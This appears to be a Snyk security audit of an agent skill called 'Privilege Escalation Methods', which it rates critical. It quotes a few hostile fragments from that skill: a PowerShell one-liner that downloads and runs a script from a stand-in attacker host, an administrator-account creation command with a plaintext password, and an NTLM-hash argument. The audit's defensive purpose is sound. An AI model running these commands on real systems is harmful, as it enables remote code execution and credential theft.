Skills
skills/davila7/claude-code-templates/Privilege Escalation Methods/Snyk

Privilege Escalation Methods

Fail

Audited by Snyk on Feb 15, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). This skill includes and instructs use of plaintext credentials and secret hashes directly in commands and examples (e.g., user:password, Password123, /rc4:<NTLM_HASH>, net user Administrator Password!@#), meaning an agent would need to accept and emit secret values verbatim — creating a high exfiltration risk.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). The facebook.com link is benign by itself, but the presence of http://attacker/shell.ps1 — a direct, untrusted PowerShell (.ps1) file served over plain HTTP from an attacker-controlled host — is a clear high-risk malware distribution indicator, so the overall set is suspicious.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The content provides explicit, step-by-step offensive techniques (Linux/Windows privilege escalation, credential harvesting, Kerberoasting, Golden Ticket creation, token impersonation, remote code execution, persistence, and data exfiltration) and references powerful post-exploitation tools (Mimikatz, Responder, Rubeus, Impacket, etc.), enabling unauthorized system compromise and credential theft.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill contains a scheduled-task example that runs PowerShell to execute a remote script via "iex (iwr http://attacker/shell.ps1)", which fetches and executes remote code at runtime and is relied upon by the task.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to perform privilege escalation (e.g., setuid binaries, chmod +s, modify cron/system services, create scheduled tasks and new users, load drivers, extract credentials and create persistence), which directly modifies system state and encourages compromising the host.
Audit Metadata
Risk Level
CRITICAL
Analyzed
Feb 15, 2026, 08:23 PM